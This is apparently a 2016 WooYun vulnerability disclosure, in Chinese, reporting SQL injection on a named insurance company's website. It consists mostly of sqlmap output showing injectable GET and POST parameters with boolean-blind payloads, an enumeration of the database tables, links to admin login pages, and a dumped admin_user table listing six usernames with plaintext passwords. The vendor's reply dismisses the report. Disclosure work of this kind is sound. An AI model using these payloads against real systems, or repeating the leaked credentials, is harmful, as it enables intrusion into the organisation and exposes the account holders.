当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171598

漏洞标题:长城人寿保险公司主站存在SQL注入漏洞

相关厂商:长城人寿保险股份有限公司

漏洞作者: 路人甲

提交时间:2016-01-21 11:34

修复时间:2016-01-21 16:06

公开时间:2016-01-21 16:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-21: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实我纳闷的是主站就有注入,为什么没人提呢= =,是因为太弱了么

详细说明:

注入点还有很多,列举两例把
url1:

http://www.ccib.com.cn/CHN/Home/HomeShow.asp?ContentID=4076


sqlmap identified the following injection point(s) with a total of 125 HTTP(s) requests:
---
Parameter: ContentID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ContentID=4076 AND 6958=6958
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ContentID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ContentID=4076 AND 6958=6958
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[9 tables]
+------------+
| admin_user |
| area       |
| branch     |
| company    |
| exam       |
| guestbook  |
| job        |
| member     |
| news       |
+------------+


Database: Microsoft_Access_masterdb
+------------+---------+
| Table      | Entries |
+------------+---------+
| member     | 2829    |
| news       | 392     |
| guestbook  | 382     |
| job        | 98      |
| area       | 34      |
| branch     | 28      |
| exam       | 19      |
| company    | 11      |
| admin_user | 6       |
+------------+---------+


漏洞证明:

url2:

http://www.ccib.com.cn:80/CHN/forum/admin/Default.asp?action=loginok (POST)
UserName=admin*&Password=admin&CheckCode=2972&Submit.x=47&Submit.y=26


sqlmap identified the following injection point(s) with a total of 133 HTTP(s) requests:
---
Parameter: UserName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: UserName=admin' AND 3572=3572 AND 'rbop'='rbop&Password=admin&CheckCode=2972&Submit.x=47&Submit.y=26
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[2 tables]
+------+
| book |
| news |
+------+


3.敏感页面
http://www.ccib.com.cn/CHN/Web/Default.asp
http://www.ccib.com.cn/adm_login.asp

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin_user
[6 entries]
+---------+----------+-----------+
| user_id | password | user_name |
+---------+----------+-----------+
| 10      | lj350    | lj        |
| 2       | 888888   | hr        |
| 3       | c1c2i3b4 | crm       |
| 6       | 353353   | feiyi     |
| 8       | cai366   | cai       |
| 9       | ccibasdf | epeng     |
+---------+----------+-----------+


登录跟没登录并没有什么区别,因为没什么卵用 - -,

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-21 16:06

厂商回复:

非我公司站点

最新状态:

暂无